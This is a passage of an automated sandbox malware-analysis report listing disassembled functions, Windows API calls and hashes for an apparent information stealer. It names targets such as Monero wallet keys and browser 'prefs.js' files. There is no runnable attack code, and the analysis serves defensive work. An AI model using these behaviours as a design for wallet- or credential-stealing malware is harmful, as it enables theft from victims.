                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: ef0033eae0076475ebb8a73f346435a5cd72c14bbfb32911dd0439ef9018629e
                                • Instruction ID: 0df8509b7d43ca7796b9a6b06a4db53a57f5f977b93ebe27ba8ce32c7fac6efc
                                • Opcode Fuzzy Hash: ef0033eae0076475ebb8a73f346435a5cd72c14bbfb32911dd0439ef9018629e
                                • Instruction Fuzzy Hash: 6F614AB1600318ABCB34EBA0EC49EFB77BCBB48700F044698B649A7145EB759785CF91
                                Function 00E24570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E24580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E24587
                                • wsprintfA.USER32 ref: 00E245A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E245BD
                                • StrCmpCA.SHLWAPI(?,00E30FC4), ref: 00E245EB
                                • StrCmpCA.SHLWAPI(?,00E30FC8), ref: 00E24601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2468B
                                • FindClose.KERNEL32(000000FF), ref: 00E246A0
                                • lstrcat.KERNEL32(?,008FE520), ref: 00E246C5
                                • lstrcat.KERNEL32(?,008FD5B8), ref: 00E246D8
                                • lstrlen.KERNEL32(?), ref: 00E246E5
                                • lstrlen.KERNEL32(?), ref: 00E246F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 470b211d5960f3594c3677fa2c6c37a282dc993530902d505cd876b1c064c448
                                • Instruction ID: 46be5967a9ef630259e99679ac56e5ef86d931bae752b1723908ef22a290d51d
                                • Opcode Fuzzy Hash: 470b211d5960f3594c3677fa2c6c37a282dc993530902d505cd876b1c064c448
                                • Instruction Fuzzy Hash: 7B5136B16403189BC764EB70DC89FEE777CBB58700F405688B64AA6184EB759B84CF91
                                Function 00E23EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00E23EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E23EDA
                                • StrCmpCA.SHLWAPI(?,00E30FAC), ref: 00E23F08
                                • StrCmpCA.SHLWAPI(?,00E30FB0), ref: 00E23F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2406C
                                • FindClose.KERNEL32(000000FF), ref: 00E24081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: 4b5305f82662e2af9a76a24f9cd3b3c7a61e7ab1eb3f07d67f735ee3dbc3a62e
                                • Instruction ID: e37ae46cad913b817dd1cf38ca4bca68008501c1edfbbef87f14dfd3f0eff7ab
                                • Opcode Fuzzy Hash: 4b5305f82662e2af9a76a24f9cd3b3c7a61e7ab1eb3f07d67f735ee3dbc3a62e
                                • Instruction Fuzzy Hash: 125136B6900318EBCB24EBB0DC85EFA73BCBB48300F445699B659A6044DB759B85CF51
                                Function 00E1ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00E1ED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E1ED55
                                • StrCmpCA.SHLWAPI(?,00E31538), ref: 00E1EDAB
                                • StrCmpCA.SHLWAPI(?,00E3153C), ref: 00E1EDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1F2AE
                                • FindClose.KERNEL32(000000FF), ref: 00E1F2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: ee0a9b4f9c9fe91ff8472610fee7ff1547160288891c7525d2b2daa9284618d3
                                • Instruction ID: 54975bbff9bf44370452d8581c95666df66887fbc06bf3f240acf51275481c95
                                • Opcode Fuzzy Hash: ee0a9b4f9c9fe91ff8472610fee7ff1547160288891c7525d2b2daa9284618d3
                                • Instruction Fuzzy Hash: 38E110729112289BDB18EB60EC56EEE73B8AF54300F4455E9F50A72052EE706F8ACF51
                                Function 00E1F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E315B8,00E30D96), ref: 00E1F71E
                                • StrCmpCA.SHLWAPI(?,00E315BC), ref: 00E1F76F
                                • StrCmpCA.SHLWAPI(?,00E315C0), ref: 00E1F785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1FAB1
                                • FindClose.KERNEL32(000000FF), ref: 00E1FAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 4f9c8f3c6ffc39df9c9072ea3dd65b312a0e57aca2256792a242fd94ceb4afde
                                • Instruction ID: e52a2680a161888cbd5d2c1df9e7022c2138183b77db2e4dd222732722ae42eb
                                • Opcode Fuzzy Hash: 4f9c8f3c6ffc39df9c9072ea3dd65b312a0e57aca2256792a242fd94ceb4afde
                                • Instruction Fuzzy Hash: 1DB136719002189BDB28FF60EC56AEE73B9AF94300F4495B9E50AB7181EF315B49CF91
                                Function 00E116D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E3510C,?,?,?,00E351B4,?,?,00000000,?,00000000), ref: 00E11923
                                • StrCmpCA.SHLWAPI(?,00E3525C), ref: 00E11973
                                • StrCmpCA.SHLWAPI(?,00E35304), ref: 00E11989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E11D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00E11DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E11E20
                                • FindClose.KERNEL32(000000FF), ref: 00E11E32
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: e978330bbd6e029185a568848cc9c1066f7f955391e220369c2305c670cf5cd8
                                • Instruction ID: 0f1d9bd41494682a24523d291b536e525793f7fa7fd2a0aa70511b3955afda5f
                                • Opcode Fuzzy Hash: e978330bbd6e029185a568848cc9c1066f7f955391e220369c2305c670cf5cd8
                                • Instruction Fuzzy Hash: 9812E0729101289BDB1DFB60EC9AAEE73B8AF54300F4455A9F50672091EF706F89CF91
                                Function 00E1DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E30C2E), ref: 00E1DE5E
                                • StrCmpCA.SHLWAPI(?,00E314C8), ref: 00E1DEAE
                                • StrCmpCA.SHLWAPI(?,00E314CC), ref: 00E1DEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1E3E0
                                • FindClose.KERNEL32(000000FF), ref: 00E1E3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 165e9b7053f92b5fb73f25a639a697041f66c74ea51ba8056da140ed240318e0
                                • Instruction ID: 29ddc383a21ee4f526e0f859f779770b36504b2f0f96ce3eebf02c4b3d202cba
                                • Opcode Fuzzy Hash: 165e9b7053f92b5fb73f25a639a697041f66c74ea51ba8056da140ed240318e0
                                • Instruction Fuzzy Hash: 1BF19F729141289BDB1DEB60EC95AEE73B8BF58300F4461E9F41A72051EF706B89CF51
                                Function 00E1DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E314B0,00E30C2A), ref: 00E1DAEB
                                • StrCmpCA.SHLWAPI(?,00E314B4), ref: 00E1DB33
                                • StrCmpCA.SHLWAPI(?,00E314B8), ref: 00E1DB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1DDCC
                                • FindClose.KERNEL32(000000FF), ref: 00E1DDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: f91edd60a16b23e9a16494a05c6d175838209d8d7a1323b711ddfcabba946a51
                                • Instruction ID: 6886ee9d292d3b803e033a5fde1858b115ba2788f55d19de115cd30c33a782a7
                                • Opcode Fuzzy Hash: f91edd60a16b23e9a16494a05c6d175838209d8d7a1323b711ddfcabba946a51
                                • Instruction Fuzzy Hash: 109156729002149BCB18FF70FC569EE73BDAF88300F449669F946B6145EE349B49CB92
                                Function 011DEE87 Relevance: 11.6, Strings: 8, Instructions: 1575COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *J;$-e/$7n$CE+$ESnk$n,^{$xbW=$yS
                                • API String ID: 0-3276988427
                                • Opcode ID: 0c0b97c61dd462f0af491a582f0c5f61af13ca49d27e77e556a90529dfd36ff8
                                • Instruction ID: 64275b43aec34b6851db1d405ee43315342fa3344fc1ec66017b54f09a01c397
                                • Opcode Fuzzy Hash: 0c0b97c61dd462f0af491a582f0c5f61af13ca49d27e77e556a90529dfd36ff8
                                • Instruction Fuzzy Hash: 03A218F360C204AFE3046E2DEC8567ABBE9EFD4720F168A3DE6C5C7744E63558058692
                                Function 00E27B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00E305AF), ref: 00E27BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00E27BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00E27C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E27C62
                                • LocalFree.KERNEL32(00000000), ref: 00E27D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
